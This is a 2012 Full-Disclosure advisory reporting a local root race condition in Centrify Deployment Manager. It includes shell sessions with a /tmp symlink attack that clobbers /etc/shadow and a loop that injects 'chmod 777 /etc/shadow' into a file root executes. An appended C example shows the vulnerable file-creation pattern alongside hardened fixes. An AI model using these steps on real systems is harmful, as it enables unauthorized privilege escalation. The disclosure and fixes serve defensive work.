
[Full-disclosure] Centrify Deployment Manager v2.1.0.283 local root



<html><body><div><h2>Centrify Deployment Manager v2.1.0.283 local root
    </h2>
    <hr size="2" width="100%">12/7/2012<br>
    <p>Taking a little longer look at the software, I managed to win a
      race condition
      and get root with files in /tmp. Here is my analysis:
    </p>
    <pre>root@h0g:/tmp# ls -l /etc/shadow
-r-------- 1 root shadow 1010 Dec 7 21:42 /etc/shadow
root@h0g:/tmp# </pre>
    <pre>larry@h0g:/tmp$ ln -s /etc/shadow centrify.cmd.0
larry@h0g:/tmp$ ls -l
total 24
lrwxrwxrwx 1 larry larry 11 Dec 7 21:48 centrify.cmd.0 -&gt; /etc/shadow
</pre>
    <p>After Analyze/Refresh Computer Information is run:
    </p>
    <pre>root@h0g:/tmp# ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow
root@h0g:/tmp# cat /etc/shadow
echo 144d823c-9c22-4d21-8446-4e2d07556177
vmware -v 2&gt; /dev/null |grep 'VMware ESX Server' &gt;/dev/null
temp=$?
echo af43ab93-cfce-485e-b16f-0d4331e0e421
exit ${temp}
root@h0g:/tmp# ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow
root@h0g:/tmp# </pre>
    <p>This sucks: we clobber the contents of /etc/shadow, and we don't
      have write permission. <br>
    </p>
    <p>
      <b>No root still.
      </b></p>
    <p>Looking at the history and trace of what was run on the target
      system we see this:
    </p>
    <pre>Execute echo "echo 8c8ac888-342b-461f-a0ab-659251f3d602" &gt; 
/tmp/centrify.cmd.0 Result =0 <font color="#3366ff"><b>&lt;----- if we create 
the file before them, we own it.  We can write to it before it's executed and 
have our command executed.</b></font>
</pre>
    <pre>Execute echo "vmware -v 2&gt; /dev/null |grep 'VMware ESX Server' 
&gt;/dev/null" &gt;&gt; /tmp/centrify.cmd.0 Result =0
Execute echo "temp=\$?" &gt;&gt; /tmp/centrify.cmd.0 Result =0
Execute echo "echo b2449bef-65c1-45e8-9da0-4801200c5c05" &gt;&gt; 
/tmp/centrify.cmd.0 Result =0
Execute echo "exit \${temp}" &gt;&gt; /tmp/centrify.cmd.0 Result =0
Execute chmod 755 /tmp/centrify.cmd.0 Result =0 
Execute dzdo -p "Password:" sh -c "/tmp/centrify.cmd.0" Result =0 <font 
color="#3366ff"><b>&lt;--- dzdo is centrify's sudo equivalent, it's part of the 
centrify suite.</b></font>
8c8ac888-342b-461f-a0ab-659251f3d602
b2449bef-65c1-45e8-9da0-4801200c5c05
Execute rm -rf /tmp/centrify.cmd.0 Result =0
Execute id -u Result =0
</pre>
    <p>So our quick dirty exploit:
    </p>
    <pre>larry@h0g:/tmp$ while (true) ; do echo "chmod 777 /etc/shadow" &gt;&gt; /tmp/centrify.cmd.0 ; done
</pre>
    <p>Will get us our command executed:
    </p>
    <pre>larry@h0g:/tmp$ ls -l /etc/shadow
<b>-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
larry@h0g:/tmp$ </b></pre>
    <p>It might work to create the file centrify.cmd.UID, then monitor
      it for the execute bit being set with inotify (IN_ATTRIB). When
      the execute bit is set, write our malicious command to the file as
      it is about to be executed by root. <br></p><p>Hopefully Kayne won't smash
my fingers with a hammer.&nbsp; ;-)<br></p>
    <p>Larry W. Cashdollar<br>
      <a href="http://vapid.dhs.org">http://vapid.dhs.org</a><br>
      @_larry0</p></div></body></html>
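As an added example (not code from the post or from Centrify), here is the create-or-truncate pattern the trace shows, in C, beside two hardened alternatives; the directory and file names are constructed for the demonstration, and the planted-symlink check models the ln -s step above so the difference can be tested.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Vulnerable pattern, as in the trace: create-or-truncate a predictable
 * name in /tmp. Whatever already sits there (a symlink, or a file another
 * user pre-created and keeps appending to) is silently reused. */
int create_cmdfile_vulnerable(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened pattern: O_EXCL fails if anything already exists at the path
 * (a symlink included), O_NOFOLLOW never dereferences a link, and mode
 * 0700 keeps other users from appending before dzdo runs the script. */
int create_cmdfile_hardened(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0700);
}

/* Preferred pattern: an unpredictable name inside a fresh 0700 directory,
 * so there is no path anyone else can create first. Returns fd or -1. */
int create_cmdfile_private(char *path, size_t len) {
    char dir[] = "/tmp/cmdfile.XXXXXX";          /* constructed prefix */
    if (!mkdtemp(dir)) return -1;
    if (snprintf(path, len, "%s/cmd.XXXXXX", dir) >= (int)len) return -1;
    return mkstemp(path);                 /* O_CREAT|O_EXCL, mode 0600 */
}

/* Constructed scenario: a symlink is planted at the predictable name
 * before the privileged tool creates it. Returns 1 if the create went
 * through the planted link, 0 if it was refused, -1 on setup failure. */
int planted_symlink_followed(int hardened) {
    char dir[] = "/tmp/planted.XXXXXX", target[64], link[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/victim", dir); /* stands in for /etc/shadow */
    snprintf(link, sizeof link, "%s/centrify.cmd.0", dir);
    close(open(target, O_WRONLY | O_CREAT, 0600));
    if (symlink(target, link) != 0) return -1;
    int fd = hardened ? create_cmdfile_hardened(link)
                      : create_cmdfile_vulnerable(link);
    int followed = fd >= 0;
    if (followed) close(fd);
    unlink(link); unlink(target); rmdir(dir);
    return followed;
}
```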
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/